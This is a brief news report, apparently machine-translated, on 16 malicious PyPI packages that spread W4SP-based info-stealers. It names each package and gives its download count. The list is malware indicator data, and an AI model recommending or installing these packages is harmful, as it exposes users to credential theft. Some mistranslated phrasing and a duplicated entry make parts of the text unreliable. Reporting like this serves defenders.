Two weeks ago, the research group Phylum reported that the Pypi repository has A set of 47 packets that infect their victims with the W4SP infostiler. Fortunately, this malicious campaign was quickly stopped after GitHub turned off the repository used by hackers to obtain a payload.
However, more recently, Phylum discovered 16 new Pypi packages distributing ten different infostilers (for example, Celestial Stealer, Angel Stealer, Satan Stealer, @skid Stealer and Leaf $ Tealer) written on the basis of W4SP.
A list of harmful packages found by researchers:
- modulesecurity – 114 downloads;
- informmmmodule – 110 downloads;
- chazz – 118 downloads;
- radomtime – 118 downloads;
- Proxygeeneratorbil – 91 download;
- easycordey -122 downloads;
- easycordey – 103 downloads;
- tomproxies – 150 downloads;
- sys -ej – 186 downloads;
- py4Sync – 453 downloads;
- infosys – 191 download;
- sysuptoer – 186 downloads;
- NowSysys – 202 downloads;
- upamonkws – 205 downloads;
- captchaboy – 123 downloads;
- proxybooster – 69 downloads.
Of all the above packages, only Chazz follows the complex W4SP attack chain, which includes several stages and the compound of the code. Instead, they put the information code directly in “Main.py” or “_init_.py”.
Chazz, in turn, throws a copy of the Leaf $ Tealer infostler and exacerbates the code using the Blankobf tool.
All new malicious ones repeat the W4SP tactics, loading a useful load from GitHub repositories. It is still unclear who is behind the spread of harmful packages, but Phylum suggests that this is the work of different hacker groups.